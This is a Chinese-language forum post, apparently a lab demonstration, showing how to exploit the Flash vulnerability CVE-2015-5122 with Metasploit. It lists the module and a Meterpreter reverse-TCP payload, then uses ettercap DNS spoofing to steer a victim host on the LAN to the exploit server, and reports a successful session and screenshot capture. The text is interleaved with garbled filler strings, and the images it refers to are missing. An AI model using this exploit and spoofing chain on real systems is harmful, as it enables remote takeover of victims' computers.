|
! u; ]9 B4 e! ` C
二、cve2015-5122漏洞实例演示虚拟机 2 H1 H1 _( s) @0 K( x4 G" U3 n
* L" m \- ^. A2 |8 ?
4 s" ?$ G# U2 y 关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: $ ~9 s4 s% ~6 l5 I# @" E
t$ f' q" U) J, [. ?. M( M! B
9 ^+ b ?2 q1 U1 u4 q6 k+ c4 O/ v& o search cve-2015-5122如图: 5 H% R( `* V$ ?
5 Y( H' M& R$ |% l) X3 U
5 ?7 v6 W6 q! [
0 N& Z9 ^% K+ b3 s& ?% c
) e/ {1 [7 G& Z1 |7 E
- p, S% ~3 J: [) r) w8 J0 F% ]
下面我们敲如下命令:
3 x" ~- b* |% d6 ]/ [ . v' b- O1 F0 c0 t! I2 |) J
& u- S/ _2 O4 V: D use exploit/multi/browser/adobe_flash_opaque_background_uaf ! X. t% T$ Y' q
7 Z/ M/ u$ H. u& {/ x! I3 |2 D' J* c/ |
set PAYLOAD windows/meterpreter/reverse_tcp . V/ |9 K3 ^( f* W
% D2 M |6 ~2 M* o4 o6 W1 {, i9 Z& ~: ~2 z7 d. @7 o7 |" m1 F8 [) j) [
set LHOST 192.168.0.109
& w- _, ]7 D$ g% R6 W + f$ S: \" n# u+ H! e8 {( p
( L0 f+ I" U$ Q0 l& G1 L) Z
set URIPATH / /*根目录*/ 6 q6 |1 P9 ~5 j8 d" E7 A) t* _
S( ]0 g. x$ C3 D& Z
. P& ^( V1 W3 q( j( ~ set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 1 y5 \6 C4 i. P* M) R
8 I s3 l, f9 \/ h
! {: i. B/ d, t6 v3 E set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用
% H ^7 i# f9 k! L% v3 X7 v* x* R
& I' b* R/ f/ o( T5 L0 ?$ [
( n' R+ O/ W$ O8 h5 |6 D i% S 然后show options如图:
5 e- i6 M; ]# u; D+ Z
0 C" |6 o$ S& |+ l. k" D' Z, ]: b# H2 R, R- A
0 k# S5 x. Y7 u9 z 4 U/ b& M( o' q. g
) S) w& F! x2 B' n
一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图: 2 U5 o$ @% ^' }( J+ Q) r3 Y
}4 w$ p( C. i8 {9 P
8 N+ `9 s) }8 A" ]" \/ X* x
5 J" E: _+ y& Z% Z 然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115
4 v7 d; A- G" \" v7 {5 _ v" D/ x
) L# d3 i# J) q, l! @! a- b' w7 ^& v5 b9 k
Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf & Y6 y3 O$ }" s# O- I
& K" A) R5 D+ L W9 {5 i/ g4 X6 Q6 V* k* m) D. ]' t
/ |- K1 t: |/ n( z
/ }# c; y. d7 v) A) i' T
- Q# H2 s! `6 e7 E4 x8 H' ~6 C
成功了,这时候我们断开ettercap,如图:
& H7 _; _! O5 d 5 e- N1 E# `! A
. e: g8 e; l. _9 f1 j: g0 Y2 U & c4 C6 D2 S' u# p3 D
8 b2 L& w6 z/ z }& [
0 K: c" [$ i4 w N5 s6 f* Y" D) e Screenshot如图:
# S: v4 _3 t4 H2 X% _, v! S9 x* b
7 T3 ^. _8 @7 q
3 S" V$ o3 s. e K" `, t# D R0 {8 X- L% Y. @& W
8 f: a4 u9 Q2 j: [$ ~/ F3 u9 L8 {) B; X/ z; Z
% p$ ]- @* ~: d8 T2 B4 S
|